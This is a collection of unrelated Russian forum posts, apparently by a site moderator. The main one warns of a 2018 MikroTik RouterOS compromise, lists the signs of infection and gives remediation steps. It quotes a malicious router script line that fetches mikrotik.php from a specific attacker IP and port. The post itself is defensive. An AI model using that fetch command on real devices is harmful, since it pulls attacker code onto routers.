Loader

apc back-Ups Pro от 2000 По поводу ПО на линукс не в курсе

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS. Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно. Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро. Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них: /tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http В файлах соответственно mikrotik.php Отключаются все запрещающие правила фаервола. Создаются задачи в планировщике по запуску скрипта. Открывается сокс-прокси на нестандартном порту. Меняются адреса днс-серверов. Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака. Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа. Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации. Ну пару советов по безопасности: IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные. Грамотно настроить фаерволл. В случае если факт взлома был зафиксирован - сменить пароль на микротик. Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Самое интересное что на многих ресиверах вещание недельки через две возобновляется, но он уже обменян на новый...

Приподниму тему

Rambler Собственно из-за таких сообщений в своё время и был закрыт раздел "Страна", т.к. после начинался переход на личности. После приходилось растаскивать народ по углам с применением санкций. Считайте это последним предупреждением и запретом поднятия темы Украины на данном форуме. Многие уважаемые люди форума оттуда родом, не думаю что кому-то нравится слышать плохое о своей родине. Модераторам даю право на любые санкции.

Меняй режим тп-линка на точку доступа и пробуй после этого делать его репитером. Ищи в тп-линке фаервол.

И это говорит человек с регистрацией меньше месяца назад и нулём полезных публикаций в профиле? Предупреждение W За неуважительное отношение к участникам форума наказан.

О проблеме известно, планируем до конца недели устранить

что-то не так с микротиком. В нём сохраняются все настройки в реальном времени и после возобновления питания восстанавливаются.

Увы но мы к данному сайту никакого отношения не имеем.

Штатные телепаты в отпуске, вы уж простите. Где Вы нашли страницу "редактирование"?

Ошибка устранена

Ситуация известна, скоро перенастроят сервер и всё будет впорядке.

файл подкачки в этом случае можно просто отключить...

По поводу разбивки на разделы - мне вообще непонятен принцип разбивки жесткого диска на кучу разделов (если используется одна операционная система). Раздел под данные должен быть один ИМХО. По молодости игрался кучей разделов, но понял несостоятельности подобного решения, поскольку в самое подходящее время заканчивается свободное место на одном из разделов.